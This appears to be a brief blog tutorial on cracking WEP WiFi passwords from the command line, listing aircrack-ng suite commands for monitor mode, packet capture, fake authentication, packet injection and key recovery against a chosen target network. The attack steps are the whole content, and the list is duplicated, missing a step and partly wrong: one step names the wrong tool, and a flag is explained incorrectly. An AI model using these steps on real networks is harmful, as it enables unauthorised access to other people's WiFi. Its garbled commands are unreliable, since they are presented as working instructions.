Crack Wep WiFi Security With Command Line
Basic Requirment
1.2 Now open the terminal
1.3 Type the command 'Iwconfig' To check the wifi card is connected or not
1.4 Now enabled the monitering mode Type command 'airmon-ng start wlan0'
1.5 Now search the networks with this command 'airodump-ng mon1'
1.6 Here we select the the target network with the help of this command
'airmon-ng -c 1 --bssid -w vikas mon1'
-c = select the channel number
--bssid= basic service set identifier
-w = give any name to the file where the password will store (vikas)
1.7 Now sending a authentication with command
'aireplay-ng -1 0 -a (bssid) -h (mac address) mon1
1.8 Now sent a packet So, type command
'aireplay-ng -2 -p 0841 -b (bssid) -h (mac address) mon1
-p = port number
- h = mac address
1.9 There is a last command that is
' aircrack-ng vikas-01.cap
- Virtual Machine
- Back track
- Usb wifi card
1.2 Now open the terminal
1.3 Type the command 'Iwconfig' To check the wifi card is connected or not
1.4 Now enabled the monitering mode Type command 'airmon-ng start wlan0'
1.5 Now search the networks with this command 'airodump-ng mon1'
1.6 Here we select the the target network with the help of this command
'airmon-ng -c 1 --bssid -w vikas mon1'
-c = select the channel number
--bssid= basic service set identifier
-w = give any name to the file where the password will store (vikas)
1.7 Now sending a authentication with command
'aireplay-ng -1 0 -a (bssid) -h (mac address) mon1
1.8 Now sent a packet So, type command
'aireplay-ng -2 -p 0841 -b (bssid) -h (mac address) mon1
-p = port number
- h = mac address
' aircrack-ng vikas-01.cap
0 comments: